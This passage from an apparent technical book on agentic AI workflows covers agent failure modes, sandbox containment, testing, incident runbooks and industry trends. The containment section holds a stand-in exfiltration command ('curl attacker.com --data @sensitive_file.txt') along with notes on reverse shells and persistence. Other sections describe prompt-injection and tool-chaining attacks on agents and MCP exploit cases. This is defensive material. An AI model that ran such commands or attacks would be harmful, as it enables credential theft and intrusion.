Symptoms. Sensitive files are modified unexpectedly, violating protected path policies. Security constraints are bypassed through tool chains, where combining multiple tools achieves an outcome that individual tools would block. Unsafe suggestions appear in generated code, introducing vulnerabilities.

Typical causes. Weak policy enforcement boundaries do not cover all attack surfaces. No pre-merge policy gates allow unsafe changes to reach the main branch. Implicit trust in generated output assumes agent output is safe without verification.

Fast fixes. Enforce allow and deny lists at the tool gateway level to prevent prohibited operations. Require policy checks in CI so violations are caught before merge. Route high-risk actions through human approval to ensure oversight.

Execution Environment Containment

Agent execution environments determine blast radius when things go wrong. Insufficient isolation allows a compromised or buggy agent to damage the host system, access sensitive data, or pivot to other systems. The containment strategy must match the risk profile of the code being executed.

Shared-kernel risks. Containerized agents (Docker, Podman) share the host kernel with other workloads. A kernel vulnerability or container escape gives the attacker access to everything on that host. This is acceptable for trusted code but insufficient for executing LLM-generated code or user-provided scripts where you cannot guarantee safety. Kernel exploits, though rare, have blast radius equal to the entire host.

Credential exposure paths. If secrets exist in the execution environment—as environment variables, mounted files, or in-memory—compromised agent code can exfiltrate them. A prompt injection attack that causes the agent to execute malicious code can then steal API keys, database credentials, or cloud access tokens. Examples include agents that echo $API_KEY to debug output that gets logged, or code that opens a reverse shell and exfiltrates environment state.

Network exfiltration. Without egress filtering, a compromised agent can send arbitrary data to attacker-controlled servers. This includes source code, user data, credentials, or internal system information. Even if credentials are protected, unrestricted networking allows data theft and command-and-control communication. A malicious agent might curl attacker.com --data @sensitive_file.txt or establish a persistent backdoor.

Persistence and lateral movement. If agent filesystems persist between runs or share state with other systems, malicious code can establish persistence or move laterally. An agent that writes to /home/user/.bashrc or modifies system cron jobs can survive restarts. One that accesses shared network filesystems can spread to other systems. Ephemeral, disposable execution environments prevent this by resetting to a clean state after every run.

Examples of insufficient isolation:

Developer laptop execution: Running untrusted agent code directly on a development machine with access to SSH keys, cloud credentials, and source repositories. A single prompt injection could compromise the entire development environment.
Long-lived containers with secrets: Agents that run in containers with environment variable secrets and no egress filtering. If the agent is compromised via prompt injection, attackers can exfiltrate credentials and pivot to cloud resources.
Shared CI runners without sandboxing: Using shared GitHub Actions runners or similar CI infrastructure to execute agent-generated code without additional isolation. A malicious PR could inject code that steals repository secrets or modifies other jobs.

Appropriate containment strategies:

For low-risk scenarios (trusted code, internal tools, read-only operations), process-level isolation or containers with basic security policies (seccomp, AppArmor) are sufficient. The convenience and ecosystem maturity outweigh isolation concerns.

For medium-risk scenarios (LLM-generated code, unknown code quality, limited external input), use containers with strict egress filtering, sealed secrets (never environment variables), and ephemeral filesystems. Add network policies that allowlist only required API endpoints.

For high-risk scenarios (user-provided code, untrusted input, access to sensitive data), use microVMs or full VMs with network-layer secret injection, default-deny networking, and fully disposable filesystems. No credentials should ever exist inside the execution environment. Consider transparent proxies that inject credentials at the network boundary, as discussed in Agentic Scaffolding.

Validation before deployment:

Before running agent code in production, verify that:

Protected paths (credentials, system files, configuration) are read-only or inaccessible
Egress filtering blocks all destinations except explicitly allowed API endpoints
Secrets are not present in the environment or filesystem
Filesystem changes do not persist between runs
Resource limits (CPU, memory, disk) prevent denial-of-service
Execution timeouts prevent runaway processes

Test these controls by intentionally trying to violate them. An agent that cannot bypass its own sandboxing is ready for production. One that can needs stronger isolation before it handles real workloads.

5) Collaboration and Workflow Failures

Symptoms. Multiple agents make conflicting changes, overwriting each other’s work. PRs churn with contradictory edits as agents undo each other’s modifications. Work stalls due to unclear ownership, with no agent taking responsibility.

Typical causes. Missing orchestration contracts leave agents without coordination rules. No lock or lease model for shared resources allows concurrent modification. Role overlap without clear handoff rules creates ambiguity about who should act.

Fast fixes. Add ownership rules per path or component so responsibilities are clear. Use optimistic locking with conflict resolution policy to handle concurrent access. Define role-specific done criteria so agents know when to stop.

Testing Strategy for Agentic Workflows

A robust strategy uses multiple test layers. No single test type is sufficient.

1. Static and Structural Checks

Use static and structural checks to fail fast before expensive model execution. These include markdown and schema validation for instruction files, ensuring they are well-formed before agents try to parse them. Prompt template linting catches common errors in prompt construction. Tool interface compatibility checks verify that agents can call the tools they expect. Dependency and version constraint checks ensure the environment matches expectations.

2. Deterministic Unit Tests (Without LLM Calls)

Test orchestration logic, parsers, and guards deterministically without involving language models. Cover state transitions to ensure the workflow moves through stages correctly. Test retry and timeout behaviour to verify failure handling works as expected. Verify permission checks to ensure access controls are enforced. Test conflict resolution rules to confirm agents handle concurrent access correctly.

Snippet status: Runnable shape (simplified for clarity).

from dataclasses import dataclass

@dataclass
class StepResult:
    ok: bool
    retryable: bool


def should_retry(result: StepResult, attempt: int, max_attempts: int = 3) -> bool:
    return (not result.ok) and result.retryable and attempt < max_attempts


def test_retry_policy():
    assert should_retry(StepResult(ok=False, retryable=True), attempt=1)
    assert not should_retry(StepResult(ok=False, retryable=False), attempt=1)
    assert not should_retry(StepResult(ok=False, retryable=True), attempt=3)

3. Recorded Integration Tests (Golden Traces)

Capture representative interactions and replay them against newer builds. Record tool inputs and outputs to create a reproducible baseline. Freeze external dependencies where possible to eliminate variance. Compare final artefacts and decision traces to detect changes in behaviour.

Use these to detect drift in behaviour after prompt, tool, or model changes.

4. Scenario and Adversarial Evaluations

Design “challenge suites” for known weak spots. These should include ambiguous requirements that could be interpreted multiple ways, contradictory documentation that forces the agent to choose, missing dependencies that test error handling, and partial outages and degraded APIs that test resilience. Include prompt-injection attempts in retrieved content to test security boundaries.

Pass criteria should include not just correctness, but also policy compliance, cost and latency ceilings, and evidence quality including citations and rationale.

5. Production Guardrail Tests

Before enabling autonomous writes and merges in production, validate that guardrails work correctly. Protected-path enforcement should block modifications to sensitive files. Secret scanning and licence checks should catch policy violations. Human approval routing should engage for high-impact actions. Rollback paths should work on failed deployments.

Case Study: MCP Supply-Chain Vulnerabilities in Practice

Two 2025 incidents illustrate how protocol-level vulnerabilities propagate through agentic systems.

CVE-2025-6514 (mcp-remote OS command injection, CVSS 9.6). The mcp-remote npm package (versions 0.0.5 through 0.1.15), used by over 437,000 AI development environments, contained an OS command injection flaw. When connecting to an untrusted MCP server, the server could craft a malicious authorization_endpoint URL that, when processed by the client’s open() function, executed arbitrary operating-system commands. The vulnerability required user interaction but no authentication. JFrog Security Research discovered and reported it; the fix (version 0.1.16) sanitised special elements in authorisation responses. The lesson: MCP client packages that handle authentication flows from external servers must treat every server response as untrusted input.

CVE-2025-68145/68143/68144 (Anthropic Git MCP server, RCE chain). Three flaws in mcp-server-git (prior to version 2025.12.18) combined into a remote-code-execution chain. CVE-2025-68145 (CVSS 7.1) bypassed the --repository flag’s path restrictions, allowing access to any repository on the system. CVE-2025-68143 let git_init create repositories at arbitrary filesystem paths. CVE-2025-68144 injected arguments through unsanitised git_diff and git_checkout parameters, enabling file overwrites. Researchers at Cyata demonstrated that chaining these flaws with a Filesystem MCP server allowed writing malicious Git smudge/clean filters that achieved full code execution. Anthropic patched all three in December 2025. The lesson: individual MCP tools may appear safe in isolation, but tool chaining creates exponential attack surface—security boundaries must be enforced at every tool invocation, not just at initialisation.

Both incidents validate the OWASP MCP Top 10 and reinforce that MCP server/client security is now a production concern, not a theoretical exercise. For governance context, see Governance and Safety Automation.

Practical Fix Patterns

When incidents happen, reusable fix patterns reduce MTTR (mean time to recovery).

Pattern A: Contract Hardening

Add strict schemas between planner and tool runner to ensure they communicate correctly. Reject malformed or out-of-policy requests early, before they can cause harm. Version contracts (v1, v2) and support migrations so changes can be rolled out incrementally.

Pattern B: Progressive Autonomy

Start in “suggest-only” mode where agents propose changes but do not execute them. Move to “execute with review” mode once confidence builds. Graduate to autonomous mode only after SLO compliance demonstrates the agent is reliable.

Pattern C: Two-Phase Execution

In the plan phase, generate proposed actions and expected effects without executing anything. In the apply phase, execute only after policy and validation checks pass. This reduces irreversible mistakes and improves auditability.

Pattern D: Fallback and Circuit Breakers

If tool failure rate spikes, disable affected paths automatically to prevent cascading failures. Fall back to a safer baseline workflow that may be less capable but more reliable. Alert operators with incident context so they can investigate and resolve the underlying issue.

Pattern E: Human-in-the-Loop Escalation

Define explicit escalation triggers that route work to humans. Repeated retries without progress indicate the agent is stuck. Any request touching protected paths should require approval. Low-confidence output in high-risk domains warrants human review.

Incident Response Runbook (Template)

Use a lightweight runbook so teams respond consistently. The sequence proceeds through eight steps.

Detect. Receive an alert from CI, runtime monitor, or user report indicating something has gone wrong.

Classify. Map the incident to a taxonomy category so you can apply the appropriate response playbook.

Contain. Stop autonomous actions if the blast radius is unclear, preventing further damage while you investigate.

Diagnose. Reproduce the issue with a trace and configuration snapshot to understand what happened.

Mitigate. Apply short-term guardrails or fallbacks to restore service while you work on a permanent fix.

Fix. Implement a structural correction that addresses the root cause.

Verify. Re-run affected test suites and adversarial cases to confirm the fix works.

Learn. Add a regression test and update documentation to prevent recurrence.

Metrics That Actually Matter

Track these metrics to evaluate reliability improvements over time.

Task success rate measures how often agents complete tasks correctly, with policy compliance as part of success. Intervention rate measures how often humans must correct the agent, indicating where automation falls short. Escaped defect rate measures failures discovered after merge or deploy, indicating gaps in pre-production testing. Mean time to detect (MTTD) and mean time to recover (MTTR) measure incident response effectiveness. Cost per successful task and latency percentiles measure efficiency.

Avoid vanity metrics (for example, “number of agent runs”) without quality and safety context.

Anti-Patterns to Avoid

Several anti-patterns undermine agentic system reliability.

Treating prompt edits as sufficient reliability work ignores the structural issues that cause failures. Prompts can only do so much; robust systems need architectural controls.

Allowing autonomous writes without protected-path policies exposes critical files to unintended modification. Every system needs explicit boundaries.

Skipping regression suites after model or version upgrades assumes backward compatibility that may not exist. Changes require validation.

Relying on a single benchmark instead of diverse scenarios creates blind spots. Real-world failures often occur in edge cases the benchmark does not cover.

Ignoring ambiguous ownership in multi-agent flows leads to gaps and conflicts. Every path and component should have a clear owner.

A Minimal Reliability Checklist

Before enabling broad production use, confirm the following items are complete. Snippets and examples should be clearly labelled as runnable, pseudocode, or simplified. Tool contracts should be versioned and validated. CI should include policy, security, and regression checks. Failure injection scenarios should be part of routine testing. Rollback and escalation paths should be documented and exercised.

Applying This to This Repository

For this repository, a minimal operational checklist is:

Run python3 scripts/check-links.py --root book --mode internal for any book/ content change.
Keep .github/workflows/*.md and .github/workflows/*.lock.yml in sync when GH-AW source workflows change.
Validate label lifecycle behavior against WORKFLOW_PLAYBOOK.md after workflow edits.
Preserve least-privilege + safe-outputs patterns in GH-AW workflow frontmatter.
Use a repository-scoped user token for safe-outputs writes when label events must trigger downstream workflows.
Scope dispatch-workflow concurrency by issue identifier to prevent burst-trigger cancellations.
Treat workflow-generated failure tracker issues as operations artifacts, not content suggestions.
Validate lifecycle paths sequentially before burst/concurrency tests.
Treat failed Pages/PDF runs as release blockers for documentation changes.

For orchestration context, see Agent Orchestration. For infrastructure boundaries, see Agentic Scaffolding.

Chapter Summary

Reliable agentic systems are built, not assumed. Teams that combine clear contracts, layered testing, progressive autonomy, strong policy gates, and incident-driven learning consistently outperform teams relying on prompt-only tuning.

In practice, your competitive advantage comes from how quickly you detect, contain, and permanently fix failures—not from avoiding them entirely.

Future Developments

Chapter Preview

This chapter surveys the trajectories that are likely to reshape agentic workflows over the coming years. It identifies concrete trends already underway—protocol standardisation, framework convergence, and autonomous agent maturation—rather than speculative predictions. The goal is to help practitioners position their architectures and skill investments for the landscape that is forming now.

Snapshot note: Vendor capabilities, funding figures, and adoption metrics in this chapter are time-sensitive and may change quickly. Treat this chapter as a dated landscape snapshot, and verify current status before making purchasing or platform commitments.

External claims in this chapter are sourced in Bibliography.

The Standardisation Wave

Interoperability Protocols

The most consequential near-term development is the maturation of open interoperability protocols. Two protocols stand out.

Model Context Protocol (MCP) has crossed the threshold from single-vendor project to industry infrastructure. Anthropic donated MCP governance to the Agentic AI Foundation (AAIF) under the Linux Foundation, and the ecosystem reports over 97 million monthly SDK downloads and more than 10,000 active MCP servers. First-class client support now spans Claude, ChatGPT, Cursor, Gemini, Microsoft Copilot, and Visual Studio Code. The launch of MCP Apps—interactive UIs rendered directly inside MCP clients—signals that the protocol is expanding beyond tool calls into richer agent-user interaction surfaces.

The practical implication is that tool authors can now write a single MCP server and have it work across all major agent clients. Teams investing in tool infrastructure should treat MCP as the default integration layer rather than building bespoke connectors for each client.

Recent MCP spec revisions also show a shift from basic interoperability toward production hardening. The protocol has moved toward streamable HTTP transport, standardized OAuth 2.1-based authorization discovery, and clearer user-input elicitation patterns. In parallel, registry patterns are becoming mainstream: teams can separate discovery (what tools exist) from activation (what tools are actually allowed in a given run).

Agent-to-Agent (A2A) protocol, contributed by Google to the Linux Foundation in June 2025, addresses a complementary gap: how agents discover and communicate with each other. While MCP connects agents to tools and data, A2A enables agents to collaborate in their natural modalities—exchanging tasks, status updates, and results. Built on HTTP, SSE, and JSON-RPC (with gRPC support added in version 0.3), A2A has attracted over 150 organisations to its ecosystem. For teams building multi-agent architectures that span organisational boundaries, A2A provides a standard handshake protocol.

Together, MCP and A2A form a two-layer interoperability stack: MCP for agent-to-tool communication, A2A for agent-to-agent communication. Systems that adopt both can compose capabilities across vendors and organisations without custom integration work.

The Agent Skills Standard

The Agent Skills specification (https://agentskills.io/specification), published by Anthropic in December 2025, provides a minimal, filesystem-first format for packaging reusable agent capabilities. A skill is a directory containing a SKILL.md file with YAML frontmatter and markdown instructions, plus optional scripts/, references/, and assets/ directories. The specification uses progressive disclosure: agents load skill content only when a user’s request matches the skill’s domain.

Adoption has been rapid. Microsoft, OpenAI, Atlassian, Figma, Cursor, and GitHub have adopted the standard, with partner-built skills from Canva, Stripe, Notion, and Zapier available at launch. The practical consequence is that skills written once can be discovered and used across agent platforms—a significant reduction in the duplication that plagued earlier approaches.

Framework Convergence

The Microsoft Agent Framework

In October 2025, Microsoft announced the convergence of Semantic Kernel and AutoGen into a unified Microsoft Agent Framework, with general availability scheduled for Q1 2026. This merger combines Semantic Kernel’s enterprise plugin architecture and .NET/Python support with AutoGen’s event-driven multi-agent orchestration. The resulting framework aims to be the default for enterprise agent development on Azure and beyond.

For teams currently using either Semantic Kernel or AutoGen, the migration path is through AutoGen v0.4’s async, event-driven architecture, which serves as the foundation for the unified framework. The key implication is that Microsoft’s agent story is consolidating rather than fragmenting, reducing the decision burden for enterprise teams.

LangChain and LangGraph at v1.0

LangChain and LangGraph both reached v1.0 milestones, signalling API stability after a period of rapid iteration. The architecture has clarified: LangChain provides high-level agent APIs (notably create_agent) that build on LangGraph’s graph-based runtime under the hood. Teams start with LangChain for rapid prototyping and drop down to LangGraph when they need custom control flow, stateful agents, or production-grade durability.

This layered approach—high-level convenience on top of low-level control—is becoming a pattern across the ecosystem and is worth watching as other frameworks mature.

Cloud-Native Agent Platforms

Major cloud providers have introduced first-party agent platforms that bundle model access, tool execution, and observability.

Amazon Bedrock AgentCore provides serverless agent deployment with built-in memory, identity, browser, code interpreter, and observability features. Multi-agent collaboration reached general availability in late 2025, making AWS one of the first major cloud providers to ship production-grade multi-agent orchestration as a managed service.

Google Agent Development Kit (ADK) is an open-source framework optimised for Gemini but compatible with other providers. It supports A2A protocol integration natively and recommends deployment to Vertex AI Agent Engine Runtime. The Python SDK is mature, and the TypeScript SDK shipped in early 2026, expanding ADK’s reach to web-focused teams. Go SDK development continues.

Vercel AI SDK 6 introduced first-class agent abstractions for TypeScript developers, including a ToolLoopAgent class, full MCP support, and durable agents through its Workflow DevKit. For teams building agent-powered web applications, this provides a natural integration path.

These platforms lower the barrier to deploying production agents by bundling infrastructure concerns (scaling, monitoring, identity) that teams would otherwise build themselves.

API-Native Agent Runtimes

A related trend is the rise of API-native runtime primitives that reduce custom orchestration glue. In OpenAI’s Responses stack, teams can combine built-in tools, remote MCP server calls, and computer-use tools in one runtime model. This changes architecture decisions: instead of wiring every capability in your own orchestrator, you can treat the API runtime as part of the control plane and keep your own code focused on policy, routing, and business logic.

The Autonomous Coding Agent Frontier

From Assistants to Autonomous Agents

The coding agent landscape has stratified into three tiers that are likely to persist and deepen.

IDE-integrated assistants (GitHub Copilot, Cursor, Windsurf) provide real-time suggestions and chat within the editor. These are the most widely adopted and continue to improve, with Windsurf’s acquisition by Cognition in July 2025 signalling consolidation in this tier.

CLI-based agents (Claude Code, Codex CLI, Aider) operate in the terminal with full repository access, making multi-file changes, running tests, and creating commits. Claude and Codex are now available as GitHub engines in public preview alongside Copilot, meaning all three major agent providers integrate directly with GitHub’s workflow infrastructure.

Fully autonomous agents (Devin) represent the frontier: agents that receive a high-level task and work through it independently over hours, handling planning, implementation, testing, and PR creation without human guidance. Cognition’s $10.2 billion valuation and the growing enterprise adoption of autonomous agents suggest this tier will continue to attract investment and capability improvements.

What This Means for Workflow Design

The practical implication is that workflow architectures need to accommodate agents at all three tiers. A production workflow might use an IDE assistant for interactive development, a CLI agent for batch operations like migration or test generation, and an autonomous agent for well-scoped tickets that can be verified automatically. Orchestration systems (including GH-AW) should be designed to assign work to the right tier based on task characteristics.

Emerging Patterns

Progressive Autonomy

The progressive autonomy pattern described in Failure Modes, Testing, and Fixes is becoming the standard deployment model for production agent systems. Teams start agents in suggest-only mode, graduate to execute-with-review, and eventually allow autonomous operation for well-understood task types. This pattern is now supported directly by platforms like Amazon Bedrock AgentCore (which provides policy controls) and GH-AW (which provides safe-outputs).

The trend is toward finer-grained autonomy controls: instead of a binary autonomous/supervised switch, teams define autonomy levels per task type, per repository, or per risk category. Expect frameworks to provide richer policy languages for expressing these boundaries.

Multi-Agent Collaboration at Scale

Early multi-agent systems used simple sequential or parallel patterns. The emerging pattern is dynamic agent teams where a coordinator spawns specialised agents based on task analysis, and those agents can themselves spawn sub-agents. This pattern is supported by Claude Code’s subagent architecture, the OpenAI Agents SDK’s handoff mechanism, and Google ADK’s multi-agent framework.

The A2A protocol extends this pattern across organisational boundaries: an agent in one organisation can discover and collaborate with agents in another organisation through standardised task delegation. While early adoption is within enterprises, cross-organisation agent collaboration is a likely growth area.

Agent Observability and Evaluation

As agents move into production, observability and evaluation are becoming first-class concerns rather than afterthoughts. Key developments include:

Tracing standards are emerging for tracking agent decision chains across tool calls and model invocations. The OpenAI Agents SDK includes built-in tracing, and MCP’s audit capabilities provide tool-level observability.

Evaluation frameworks are moving beyond single-task benchmarks to scenario suites that test agent behaviour across diverse conditions, including adversarial inputs and degraded environments. The metrics outlined in Failure Modes, Testing, and Fixes—task success rate, intervention rate, escaped defect rate—are becoming standard.

Cost attribution is becoming more sophisticated as agent workflows involve multiple model calls, tool invocations, and sub-agent spawns. Understanding per-task cost is essential for making agents economically viable at scale.

Agent Trace (https://agent-trace.dev/) is an emerging open specification (RFC v0.1.0, January 2026) for recording AI contributions alongside human authorship in version-controlled codebases. Led by Cursor and supported by Cognition, Cloudflare, Vercel, Google Jules, and others, Agent Trace provides a vendor-neutral JSON format that connects code ranges to the conversations and contributors behind them. As AI-generated code becomes a larger share of commits, attribution metadata will become essential for debugging, compliance, and agent performance improvement.

Shared Memory and Context Spaces

Another notable trend is explicit memory and shared-context products for coding assistants. GitHub Copilot Memory (public preview) builds persistent, repository-scoped memory that learns coding preferences, naming conventions, and framework choices from corrections and interactions over time. Memories are scoped per-repository or per-user, auto-expire after 28 days unless reused, and users retain full control to review, edit, or delete individual entries. Complementing this, Copilot Spaces (generally available since September 2025, with public sharing added December 2025) provides team-curated knowledge bases that organise repositories, code, PRs, issues, free-text notes, and file uploads into a shared project context—without requiring underlying repository access. Memory provides implicit, automatic adaptation within a single repository, while Spaces provides explicit, collaborative context across multiple repositories. Together they push teams toward persistent project context as a first-class artifact, not just transient prompt state. In practice, this reduces repeated instruction overhead and improves continuity, but it also raises governance questions: which memories are retained, who can inspect them, and when they should expire.

Multimodal and Physical Agency

Multimodal agents that blend text, vision, speech, and code are becoming default rather than optional. Frameworks are adding toolchains for document understanding, UI automation, and robotic control, closing the loop between digital and physical actions. This shift matters because it expands the surface area of what an agent can verify autonomously (e.g., reading dashboards, inspecting UI states, interpreting camera feeds) without human intervention.

Computer-Use Safety Loops

Computer-use capabilities are maturing alongside explicit safety controls. The newest generation of computer-use tooling emphasizes user confirmation for high-impact actions, tighter scope boundaries, and stronger treatment of prompt injection from on-screen content. The direction of travel is clear: computer use is becoming practical, but only when paired with strict human-in-the-loop checkpoints and constrained execution policies.

Governance and Safety Automation

Regulators are increasingly demanding traceability, data minimisation, and safety controls for autonomous systems. Agent stacks are responding with policy engines that enforce allow/deny rules, runtime red-teaming, and signed skill bundles. Two new frameworks crystallise the threat landscape: the OWASP MCP Top 10 catalogues protocol-level risks from token mismanagement and tool poisoning to shadow MCP servers and context over-sharing, while the OWASP Top 10 for Agentic Applications (2026) covers the broader attack surface of autonomous agents, introducing the principle of “least agency”—granting agents only the minimum autonomy required for bounded tasks. Real-world MCP exploits have already validated these frameworks: CVE-2025-68145/68143/68144 enabled remote code execution through Anthropic’s Git MCP server via path validation bypass and argument injection, and CVE-2025-6514 (CVSS 9.6) in the mcp-remote package affected over 437,000 AI development environments. The first malicious MCP server found in the wild (September 2025) secretly BCC’d every email through a Postmark impersonation. Expect governance requirements (audit logs, privacy zones, least-privilege tool access) to become a gating factor for enterprise deployment, pushing teams to treat safety automation as a first-class feature rather than an afterthought.

The Local-First Personal AI Wave

One of the most striking developments of late 2025 and early 2026 is the explosive growth of local-first personal AI assistants, led by OpenClaw (183,000+ GitHub stars, 3,000+ community skills, 100,000+ active installations). These are not coding agents or enterprise tools—they are general-purpose AI assistants that users self-host on their own hardware, connecting to WhatsApp, Telegram, Slack, Discord, and dozens of other channels through a single brain with shared context and persistent memory.

This trend represents a shift in who controls the agent. Where cloud-hosted AI services control the data, the model, and the interaction surface, local-first assistants put all three under user ownership. The architectural patterns—gateway/runtime separation, model-agnostic backends, plugin-based skills—mirror what enterprise agent frameworks provide, but optimised for individual users rather than organisations.

The personal AI ecosystem is diversifying rapidly. Letta (formerly MemGPT) focuses on sophisticated memory management, allowing agents to learn and self-improve over time. LettaBot brings Letta’s memory to a multi-channel assistant. Langroid provides lightweight multi-agent orchestration. Open Interpreter turns natural language into computer actions. Leon offers a minimal, self-hosted assistant.

For the broader agentic workflows field, the personal AI wave matters for three reasons. First, it validates the architectural patterns described throughout this book—skills, tools, MCP integration, multi-agent orchestration—at consumer scale. Second, it surfaces security challenges that enterprise deployments will also face—notably, the ClawHavoc campaign (February 2026) saw 341 malicious skills deploying Atomic Stealer across macOS and Windows, Censys counted 30,000+ exposed instances, and Gartner recommended enterprises block OpenClaw immediately. Third, it demonstrates that the demand for AI agents extends far beyond software development into every domain of digital life.

Open Questions

Several questions remain genuinely open and will shape the field’s direction.

How far can autonomous agents go? Current autonomous agents handle well-scoped tasks with clear success criteria. Whether they can reliably handle ambiguous, open-ended work—architectural decisions, trade-off analysis, creative problem-solving—remains an open question. The answer will determine how much of software development becomes agent-driven versus agent-assisted.

Will interoperability standards converge? MCP and A2A address different layers of the stack, but there is no guarantee they will remain complementary rather than competing. The Linux Foundation governance of both protocols is a positive signal, but standards fragmentation remains a risk.

How will agent security evolve? As agents gain more autonomy and tool access, the attack surface expands. Prompt injection, tool misuse, and supply-chain attacks on skills and plugins are no longer theoretical—the OpenClaw malicious-skills incident and MCP security advisories have demonstrated real-world exploitation. The field needs security practices that scale with agent capability, including skill signing, runtime sandboxing, and automated secret-leak detection.

What happens to developer roles? The stratification of coding agents into assistants, CLI agents, and autonomous agents will reshape how development teams organise. The balance between human oversight and agent autonomy will vary by organisation, risk tolerance, and regulatory context.

How will governance and regulation keep pace? Jurisdictions are drafting rules for auditability, provenance, and safety thresholds. Agent platforms may need built-in certification hooks, provenance tracking, and opt-in data minimisation to satisfy region-specific requirements without forking architectures.

Key Takeaways

Protocol standardisation (MCP for agent-to-tool, A2A for agent-to-agent) is reducing integration friction and enabling cross-vendor agent ecosystems. Invest in these standards now rather than building bespoke integrations.

Framework convergence (Microsoft Agent Framework, LangChain/LangGraph v1.0, cloud-native platforms) is simplifying the framework selection landscape. Choose frameworks based on your deployment target and existing infrastructure rather than chasing the newest option.

The coding agent landscape has stratified into IDE assistants, CLI agents, and autonomous agents. Design workflows that assign work to the right tier based on task characteristics and risk profile.

Progressive autonomy is the standard deployment model. Start supervised, measure performance, and expand autonomy incrementally based on evidence.

Observability and evaluation are becoming as important as agent capability. Invest in tracing, cost attribution, and scenario-based evaluation alongside agent development.

Governance and safety automation will shape deployment eligibility. Build policy controls, audit trails, and least-privilege defaults early to satisfy regulatory expectations.

Local-first personal AI assistants (OpenClaw, Letta, LettaBot) are validating enterprise agentic patterns at consumer scale, while surfacing concrete security challenges—malicious skill packages, secret leakage, supply-chain attacks—that affect the whole field.

Open questions around autonomy limits, standard convergence, security, and developer roles will shape the field over the next two to three years. Stay informed and maintain architectural flexibility.

Bibliography {-}

GitHub Agentic Workflows documentation. https://github.github.io/gh-aw/. Accessed: 2026-02-05.
GitHub Agentic Workflows repository. https://github.com/github/gh-aw. Accessed: 2026-02-05.
GitHub Copilot documentation. https://docs.github.com/en/copilot. Accessed: 2026-02-05.
GitHub Copilot coding agent. GitHub Docs. Accessed: 2026-02-05.
Copilot coding agent environment customization. GitHub Docs. Accessed: 2026-02-05.
Model Context Protocol (MCP). https://modelcontextprotocol.io/. Accessed: 2026-02-05.
MCP Apps announcement. http://blog.modelcontextprotocol.io/posts/2026-01-26-mcp-apps/. Accessed: 2026-02-06.
MCP specification changelog (2025-06-18). https://modelcontextprotocol.io/specification/2025-06-18/changelog. Accessed: 2026-02-06.
MCP Registry overview. https://modelcontextprotocol.io/docs/learn/mcp-registry. Accessed: 2026-02-06.
MCP Registry about page. https://modelcontextprotocol.io/registry/about. Accessed: 2026-02-06.
Agent Skills specification. https://agentskills.io/specification. Accessed: 2026-02-06.
Agent Skills overview. https://agentskills.io/home. Accessed: 2026-02-06.
Skills Protocol documentation. https://skillsprotocol.com/. Accessed: 2026-02-05.
Skills Protocol Implementation Guide. https://skillsprotocol.com/implementation-guide. Accessed: 2026-02-05.
Skills Protocol specification. https://skillsprotocol.com/specification. Accessed: 2026-02-05.
Agent Skills format: Skill structure. https://skillsprotocol.com/skill-structure. Accessed: 2026-02-05.
Agent Skills format: Skill manifest. https://skillsprotocol.com/skill-manifest. Accessed: 2026-02-05.
OpenAI. https://openai.com/. Accessed: 2026-02-05.
Anthropic. https://www.anthropic.com/. Accessed: 2026-02-05.
OpenAI Codex overview. https://openai.com/index/introducing-codex/. Accessed: 2026-02-05.
OpenAI Codex documentation. https://developers.openai.com/codex. Accessed: 2026-02-06.
OpenAI GPT-5.3-Codex announcement. https://openai.com/index/introducing-gpt-5-3-codex/. Accessed: 2026-02-06.
OpenAI Responses API: new tools and features. https://openai.com/index/new-tools-and-features-in-the-responses-api/. Accessed: 2026-02-06.
OpenAI Responses API built-in tools guide. https://platform.openai.com/docs/guides/tools?api-mode=responses. Accessed: 2026-02-06.
OpenAI Responses API remote MCP guide. https://platform.openai.com/docs/guides/tools-remote-mcp?api-mode=responses. Accessed: 2026-02-06.
OpenAI Responses API computer-use guide. https://platform.openai.com/docs/guides/tools-computer-use?api-mode=responses. Accessed: 2026-02-06.
OpenAI Agents SDK (Python). https://openai.github.io/openai-agents-python/. Accessed: 2026-02-06.
OpenAI Agents SDK (TypeScript). https://openai.github.io/openai-agents-js/. Accessed: 2026-02-06.
Claude Code documentation. https://code.claude.com/docs. Accessed: 2026-02-05.
Claude and Codex available on GitHub (public preview). https://github.blog/changelog/2026-02-04-claude-and-codex-are-now-available-in-public-preview-on-github/. Accessed: 2026-02-06.
GitHub Copilot Memory. https://docs.github.com/copilot/how-tos/context/copilot-memory. Accessed: 2026-02-06.
GitHub Copilot Spaces. https://docs.github.com/copilot/how-tos/context/copilot-spaces. Accessed: 2026-02-06.
Anthropic computer use documentation. https://docs.anthropic.com/en/docs/agents-and-tools/computer-use. Accessed: 2026-02-06.
Cursor editor. https://www.cursor.com/. Accessed: 2026-02-05.
CodeGPT. https://codegpt.co/. Accessed: 2026-02-05.
Aider: AI pair programming in your terminal. https://aider.chat/. Accessed: 2026-02-06.
Devin by Cognition. https://devin.ai/. Accessed: 2026-02-06.
Windsurf (formerly Codeium). https://windsurf.com/. Accessed: 2026-02-06.
LangChain documentation. https://docs.langchain.com. Accessed: 2026-02-06.
LangGraph documentation. https://langchain-ai.github.io/langgraph/. Accessed: 2026-02-05.
CrewAI documentation. https://docs.crewai.com/. Accessed: 2026-02-05.
AYNIG (All You Need Is Git): Git-native orchestration framework. https://github.com/hacknlove/all-you-need-is-git. Accessed: 2026-02-08.
Microsoft Semantic Kernel. https://learn.microsoft.com/semantic-kernel/. Accessed: 2026-02-05.
AutoGen documentation (v0.4). https://microsoft.github.io/autogen/stable/. Accessed: 2026-02-06.
AutoGen v0.2 to v0.4 migration guide. https://microsoft.github.io/autogen/stable/user-guide/agentchat-user-guide/migration-guide.html. Accessed: 2026-02-06.
Google Agent Development Kit (ADK). https://google.github.io/adk-docs/. Accessed: 2026-02-06.
Agent-to-Agent (A2A) protocol. https://a2a-protocol.org/latest/. Accessed: 2026-02-06.
A2A protocol GitHub repository. https://github.com/a2aproject/A2A. Accessed: 2026-02-06.
Amazon Bedrock Agents. https://aws.amazon.com/bedrock/agents/. Accessed: 2026-02-06.
Vercel AI SDK. https://ai-sdk.dev/. Accessed: 2026-02-06.
OpenClaw. https://openclaw.ai/. Accessed: 2026-02-06.
OpenClaw GitHub repository. https://github.com/openclaw/openclaw. Accessed: 2026-02-06.
pi-mono agent toolkit. https://github.com/badlogic/pi-mono. Accessed: 2026-02-06.
Letta (formerly MemGPT). https://www.letta.com/. Accessed: 2026-02-06.
Letta GitHub repository. https://github.com/letta-ai/letta. Accessed: 2026-02-06.
LettaBot: multi-channel personal AI assistant. https://github.com/letta-ai/lettabot. Accessed: 2026-02-06.
Langroid. https://langroid.github.io/langroid/. Accessed: 2026-02-06.
